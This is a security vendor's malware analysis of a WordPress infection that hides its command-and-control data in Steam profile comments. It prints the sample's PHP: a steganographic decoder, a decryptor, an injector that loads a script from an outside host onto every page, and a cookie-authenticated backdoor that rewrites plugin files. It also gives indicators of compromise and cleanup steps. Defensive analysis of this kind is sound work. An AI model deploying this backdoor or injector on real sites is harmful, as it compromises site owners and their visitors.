--- title: "Malware Targeting WordPress Abuses Steam Community Profiles for Command & Control Operations" date: "2026-05-28T10:34:03" url: "https://www.godaddy.com/resources/news/malware-targeting-wordpress-abuses-steam-community-profiles" --- # Malware Targeting WordPress Abuses Steam Community Profiles for Command & Control Operations ## **Key findings ** - GoDaddy Security researchers have identified malware that uses Steam Community profile comments to host encoded command and control data, hiding malicious infrastructure behind Valve's legitimate platform. - The malware employs invisible Unicode characters to conceal payloads within Steam profile comments, enabling steganographic data encoding that evades traditional text-based detection methods. - Technical implementation includes AES-256-CTR encryption with PBKDF2 key derivation and HMAC authentication to protect command and control communications. - A cookie-authenticated backdoor enables remote code execution, allowing attackers to modify plugin and theme files by sending base64-encoded PHP code via POST requests.## Overview GoDaddy Security researchers have analyzed malware that uses an unconventional approach to command and control: encoding malicious payloads for WordPress within Steam Community profile comments. This technique allows threat actors to hide their infrastructure behind Valve's trusted gaming platform rather than maintaining obviously malicious servers. The malware performs two primary functions: 1. Client-side JavaScript injection: Fetches encoded URLs from Steam profile comments, decodes them, and injects external JavaScript into WordPress pages 2. Server-side backdoor: Provides cookie-authenticated remote access for modifying PHP files across plugins and themes The campaign was first detected by GoDaddy Security in July 2025, and researchers have detected the malware on approximately 1,980 WordPress sites. Analysis of the code sample and observed behavior forms the basis of this technical breakdown. ## Technical analysis ### Attack chain overview The malware implements two parallel attack chains: **Client-side chain:** 1. Fetch Steam Community profile page using cURL 2. Extract content from **commentthread_comment_text**div 3. Decode hidden payload using steganography and optional encryption 4. Inject decoded URL as JavaScript using **wp_enqueue_script()**with the**asahi-jquery-min-bundle** handle. **Server-side chain:** 1. Hook into WordPress **template_redirect**action 2. Check for authentication cookies in POST requests 3. Execute ping response or code modification based on cookie present 4. Search and replace code in plugin/theme files when instructed ### Stage 1: Steam profile fetching The malware uses WordPress page loads to trigger HTTP requests to Steam Community profiles. The code uses cURL with the following configuration: function Ce8d26cADf211699($url) { $cache_key = "caption_" . md5($url); $curl = curl_init($url); curl_setopt_array($curl, [ CURLOPT_RETURNTRANSFER => true, CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", CURLOPT_TIMEOUT => 10, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => 0 ]); $html = curl_exec($curl); // Extract commentthread_comment_text div content if (preg_match("/]*class=[\"']commentthread_comment_text[\"'][^>]*>(.*?)<\/div>/is", $html, $matches)) { $content = $matches[1]; set_transient($cache_key, $content, 300); return $content; } return get_transient($cache_key); } The malware has been observed fetching the following Steam profiles: - https://steamcommunity[.]com/profiles/76561199096946028/ - https://steamcommunity[.]com/id/ravypadliha - https://steamcommunity[.]com/id/enomisvool123/ - https://steamcommunity[.]com/id/eremohin342 The extracted content is cached using WordPress transients with a 5-minute expiration. ##### Malware disguised as ASCII art comments ![a screenshot of a computer](https://www.godaddy.com/resources/wp-content/uploads/2026/05/ascii_art_comment1.png?size=1024x1024) ![Comment spam](https://www.godaddy.com/resources/wp-content/uploads/2026/05/ascii_art_comment-1.png?size=1024x1024) ![Example of Steam commentthread_comment_text content](https://www.godaddy.com/resources/wp-content/uploads/2026/05/ascii_art_comment_inspect.png?size=1024x1024) **Example of Steam commentthread_comment_text content** ### Stage 2: Steganographic decoding After extracting the Steam comment text, the malware processes it through a decoder that handles two encoding methods: invisible Unicode steganography and optionally encrypted payloads. #### Unicode steganography The decoder uses six invisible Unicode characters to encode binary data: $invisible_chars = [ "\u{200C}", // Zero-width non-joiner (U+200C) "\u{200D}", // Zero-width joiner (U+200D) "\u{2061}", // Function application (U+2061) "\u{2062}", // Invisible times (U+2062) "\u{2063}", // Invisible separator (U+2063) "\u{2064}" // Invisible plus (U+2064) ]; After removing all visible decoy characters, the decoder is left with only the invisible Unicode sequence (the encoded payload). Depending on the sample, the decoded bytes may then be decrypted using the optional crypto routine described below. U+2062, U+2064, U+200C, U+2062, U+200C, U+2061, U+2063, U+2064, U+200D, U+200C, U+2064, U+200D, U+200C, U+200C, U+2061, U+200D, U+200C, U+200D, U+2061, U+200C, U+2061, U+200D, U+2061, U+200D, U+2064, U+2061, U+200D, U+200C, U+2062, U+2061, U+200D, U+2062, U+2064, U+200C, U+2062, U+200C, U+2061, U+200C, U+2062, U+2064, U+200C, U+2064, U+2061, U+200D, U+2064, U+2061, U+200C, U+2063, U+2062, U+200D, U+200C, U+200D, U+2061, U+200C, U+2062, U+2062, U+2061, U+200C, U+2061, U+200C, U+2062, U+200D, U+200C, U+200C, U+2061, U+200D, U+2062, U+200C, U+2061, U+200D, U+2061, U+2062, U+2061, U+200D, U+200C, U+200D, U+2062, U+200D, U+200C, U+200C, U+2061, U+200C, U+2062, U+200C, U+2061, U+200D, U+200C, U+200C, U+2061, U+200D, U+2062, U+200C, U+2061, U+2063, U+200C, U+2061, U+200D, U+2064, U+2061, U+200C, U+2061, U+2062, U+2062, U+200D, U+200C, U+200D, U+2061, U+200D, U+200C, U+2064, U+2063, U+2064, U+200D, U+200C, U+200D, U+2062, U+200D, U+200C, U+200D, U+2061, U+2063, U+200D, U+2061, U+200C, U+2062, U+200C The decoding process: 1. Scan text for invisible Unicode characters 2. Map each character to a number (0-5) 3. Convert numbers to binary representation (2 bits each) 4. Reconstruct bytes from binary stream 5. Apply bitwise NOT operation to each byte (~byte & 0xFF) 6. Attempt gzip decompression if output contains non-printable characters This encoding allows binary data to be embedded within normal-looking text. The visible characters serve as camouflage while the invisible characters carry the actual payload. #### Encryption layer The malware includes code to handle encrypted payloads, though the encryption is optional: function EdF20922Ff709e68($encoded_data, $password = '') { // Extract salt (8 bytes), HMAC (32 bytes), and ciphertext $salt = substr($decoded, 0, 8); $hmac = substr($decoded, 8, 32); $ciphertext = substr($decoded, 40); // Derive key using PBKDF2 with SHA-512, 10,000 iterations $key_material = hash_pbkdf2('sha512', $password, $salt, 10000, 48, true); $iv = substr($key_material, 0, 16); $key = substr($key_material, 16, 32); // Decrypt using AES-256-CTR $plaintext = openssl_decrypt($ciphertext, 'aes-256-ctr', $key, OPENSSL_RAW_DATA, $iv); // Verify HMAC-SHA256 $computed_hmac = hash_hmac('sha256', $plaintext, $key, true); if (!hash_equals($hmac, $computed_hmac)) { return ''; } return $plaintext; } The encryption implementation uses: - PBKDF2 key derivation with SHA-512 hash, 10,000 iterations - AES-256-CTR mode for encryption - HMAC-SHA256 for authentication - Constant-time comparison (hash_equals) for HMAC verification ### Stage 3: JavaScript injection The decoded payload is used to construct a URL, which is then injected into WordPress pages: function G7jp2L84mnVc4LNW9wcbZcaVFAyC9N72() { $url = "https://" . EdF20922Ff709e68( Ce8d26cADf211699("https://steamcommunity.com/profiles/76561199096946028/") ); if (filter_var($url, FILTER_VALIDATE_URL)) { wp_enqueue_script( "asahi-jquery-min-bundle", $url, array(), null, true ); } } add_action("wp_enqueue_scripts", "G7jp2L84mnVc4LNW9wcbZcaVFAyC9N72"); The decoded URL observed during analysis: hxxps://hello-mywordl[.]info/js/lodash[.]core[.]min[.]js ![PublicWWW results showing websites loading hello-mywordl.info](https://www.godaddy.com/resources/wp-content/uploads/2026/05/hello_mywordl_info.jpg?size=1024x1024) *PublicWWW results showing websites loading **hello-mywordl[.]info*** The script is loaded on every WordPress frontend page via the **wp_enqueue_scripts** hook. The handle name "asahi-jquery-min-bundle" and filename "lodash.core.min.js" mimic legitimate JavaScript libraries. ### Stage 4: Server-side backdoor The malware implements a backdoor that responds to POST requests containing specific authentication cookies. add_action("template_redirect", "mpzZYIbGOb"); function mpzZYIbGOb() { if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_COOKIE['DEpjndDbNc'])) { // Ping/version response handle_ping(); } elseif (isset($_COOKIE['tEcaKKXEsb'])) { // Code modification handle_code_update(); } } } #### Backd*o*or function 1: Ping/keepalive When the DEpjndDbNc cookie is present, the backdoor responds with: if (isset($_COOKIE['DEpjndDbNc'])) { if (ob_get_length()) ob_clean(); header('Content-Type: text/plain'); echo "OK\n"; echo "V:1767964512"; exit; } This provides a method to verify the backdoor is operational and retrieve a version identifier. #### Backdoor function 2: Remote code execution When the **tEcaKKXEsb** cookie is present, the backdoor accepts base64-encoded PHP code via POST parameter: if (isset($_COOKIE['tEcaKKXEsb'])) { if (!isset($_POST['new_code'])) { http_response_code(400); echo "Invalid input"; exit; } $new_code = base64_decode($_POST['new_code']); // Search plugins directory for marker string $result = search_and_replace_in_files( WP_CONTENT_DIR . '/plugins', base64_decode('RzdqcDJMODRtblZjNExOVzl3Y2JaY2FWRkF5QzlONzI='), $new_code ); // Search themes directory for marker string $result .= search_and_replace_in_files( WP_CONTENT_DIR . '/themes', base64_decode('RzdqcDJMODRtblZjNExOVzl3Y2JaY2FWRkF5QzlONzI='), $new_code ); header('Content-Type: text/plain'); echo "OK\n"; echo $result; exit; } The marker string decodes to: G7jp2L84mnVc4LNW9wcbZcaVFAyC9N72 (the function name used for script injection). The file modification function searches recursively through plugin and theme directories: function search_and_replace_in_files($directory, $search_string, $replacement) { $files = recursively_list_files($directory); foreach ($files as $file) { $lines = file($file); foreach ($lines as $line_num => $line) { if (strpos($line, $search_string) !== false) { $lines[$line_num] = $replacement . PHP_EOL; file_put_contents($file, implode('', $lines)); return "Found and replaced in: $file on line " . ($line_num + 1); } } } } This mechanism allows attackers to: - Replace existing malware code with updated versions - Modify the injected script URL without re-compromising the site - Maintain persistence after partial cleanup attempts ## Code obfuscation techniques The malware employs several obfuscation methods to evade detection: ### String encoding All string constants use octal or hexadecimal escape sequences: // Octal encoding examples "\143\x55\x52\x4c" // "cURL" "\167\160\137\145\156\161\x75\x65\165\x65" // "wp_enqueue" // Hexadecimal encoding examples "\x68\164\164\160\163\x3a\x2f\x2f" // "https://" "\x73\x74\x65\x61\x6d\143\x6f\x6d" // "steamcom" This prevents simple text searches from identifying suspicious strings like URLs or function names. ### Randomized identifiers Function and variable names use mixed-case hexadecimal-style naming: Bb6621c281Bd67C7 // Logger function (disabled) Ce8d26cADf211699 // Steam fetcher fE51D3035bbc1fC8 // Cache retrieval a7b52DEAAB65BdeA // HTML entity decoder EdF20922Ff709e68 // Cryptographic decoder G7jp2L84mnVc4LNW9wcbZcaVFAyC9N72 // Script injector mpzZYIbGOb // Backdoor handler These names appear random but remain consistent across infections. ### Decoy code The malware includes a non-functional logging system: function Bb6621c281Bd67C7($log_data) { $enabled = false; // Hardcoded to false if (WP_DEBUG && WP_DEBUG_LOG && $enabled) { error_log(print_r($log_data, true)); } } The **$enabled** variable is hardcoded to false, ensuring the logging never executes. Calls to this function are scattered throughout the code: Bb6621c281Bd67C7("Fetching content from URL: $url"); Bb6621c281Bd67C7("Caption cached under key: $cache_key"); This creates the appearance of debugging infrastructure without providing any functionality. ### WordPress API usage The malware uses standard WordPress functions throughout: wp_enqueue_script() // JavaScript injection add_action() // Hook registration get_transient() // Cache retrieval set_transient() // Cache storage curl_init() // HTTP requests file_get_contents() // File reading file_put_contents() // File writing This mimics legitimate plugin behavior patterns, making behavioral detection more difficult. ### Infection vector The malware does not appear to exploit any specific version of WordPress, plugin, or theme vulnerability. The most likely infection methods are: 1. Stolen WordPress admin credentials - Attackers log in with legitimate credentials and manually install malicious code 2. Compromised FTP/SFTP credentials - Direct file system access allows code injection 3. Vulnerable plugin or theme - Exploitation of unpatched security vulnerabilities 4. Compromised FTP/SFTP credentials - Direct file system access allows code injection 5. Vulnerable plugin or theme - Exploitation of unpatched security vulnerabilities 6. Supply chain compromise - Malicious code in third-party plugins or themes ## Detection and response Security teams can identify this malware through several key indicators: The malware was discovered in **/wp-content/themes/gt3-child/functions.php** but can appear in any PHP file. File-based detection should focus on searching WordPress plugin and theme directories for references to steamcommunity.com, the presence of invisible Unicode character arrays (U+200C, U+200D, U+2061-U+2064), cryptographic functions like hash_pbkdf2 and openssl_decrypt with AES-256-CTR mode, and disabled SSL verification (CURLOPT_SSL_VERIFYPEER set to false). Network monitoring should alert on outbound connections from WordPress servers to Steam Community, JavaScript loading from non-CDN domains like hello-mywordl[.]info, and POST requests containing the authentication. WordPress-specific indicators include suspicious transient cache entries with the _transient_caption_ prefix and enqueued scripts pointing to external URLs. If an infection is detected, site administrators should first document the compromise by backing up the infected installation and preserving server access logs before making any changes. Enable maintenance mode to prevent visitor exposure to injected JavaScript. Update all credentials including WordPress admin accounts, database passwords, FTP/SFTP access, hosting control panel logins, and SSH keys. Review server logs for evidence of backdoor usage by searching for the authentication cookie names and POST parameters named new_code, which indicate active exploitation of the remote code execution capability. Cleanup should prioritize restoration from a known-clean backup predating the infection whenever possible. If backups are unavailable or unreliable, manual remediation requires searching for and removing malicious code from all plugin and theme files, clearing suspicious WordPress transients from the database, verifying that no malicious scripts remain enqueued, and updating WordPress core along with all plugins and themes to current versions. The remote code rewriting capability means partial cleanup may be insufficient—attackers can reinstall removed code through the backdoor if any component remains active. ## GoDaddy detection and protection GoDaddy's [website security solutions](https://www.godaddy.com/web-security/website-security) help protect against this type of malware through signature-based detection and automated scanning. GoDaddy Security can: - Monitor for new variants - Update detection signatures - Analyze emerging patterns - Share intelligence with the security community ## Conclusion This malware campaign demonstrates an unusual approach to command and control by leveraging Steam Community profiles and WordPress to host encoded payloads. The use of invisible Unicode steganography, combined with optional AES-256-CTR encryption, allows attackers to hide malicious data in plain sight on Valve's trusted platform. The malware's two-stage operation (client-side JavaScript injection and server-side backdoor) provides both immediate visitor impact and long-term persistent access. The cookie-authenticated backdoor's ability to remotely rewrite code allows attackers to maintain access even after detection and partial cleanup. **Key technical characteristics:** 1. Steam Community abuse: Uses Valve's platform for C2 rather than maintaining separate malicious infrastructure 2. Steganographic encoding: Embeds binary data using invisible Unicode characters 3. Cryptographic protection: Implements AES-256-CTR with PBKDF2 key derivation and HMAC authentication 4. Remote code execution: Cookie-authenticated backdoor enables file modification via POST requests 5. Multi-layer obfuscation: Combines string encoding, randomized identifiers, decoy code, and WordPress API usage ## GoDaddy's commitment GoDaddy Security continues to monitor this threat and updates detection signatures as new variants are identified. We have successfully detected and remediated infections across our customer base and continue to share intelligence with the broader security community.